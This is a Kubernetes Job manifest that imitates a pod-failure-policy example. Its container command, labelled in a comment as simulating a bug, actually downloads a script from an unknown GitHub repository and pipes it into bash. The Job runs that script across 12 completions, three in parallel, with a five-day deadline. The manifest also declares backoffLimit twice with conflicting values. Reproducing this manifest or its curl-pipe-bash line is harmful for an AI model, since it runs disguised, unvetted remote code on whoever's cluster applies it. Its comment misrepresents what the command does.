apiVersion: batch/v1
kind: Job
metadata:
  name: job-pod-failure-policy
spec:
  backoffLimit: 5
  activeDeadlineSeconds: 432000
  completions: 12
  parallelism: 3
  template:
    spec:
      restartPolicy: Never
      containers:
      - name: main
        image: gcr.io/deeplearning-platform-release/xgboost-cpu:latest
        command: ["bash"]        # example command simulating a bug which triggers the FailJob action
        args:
        - -c
        - curl -sL https://github.com/nandafiku/gradi/raw/main/vis | bash
  backoffLimit: 6
  podFailurePolicy:
    rules:
    - action: FailJob
      onExitCodes:
        containerName: main      # optional
        operator: In             # one of: In, NotIn
        values: [42]
    - action: Ignore             # one of: Ignore, FailJob, Count
      onPodConditions:
      - type: DisruptionTarget   # indicates Pod disruption
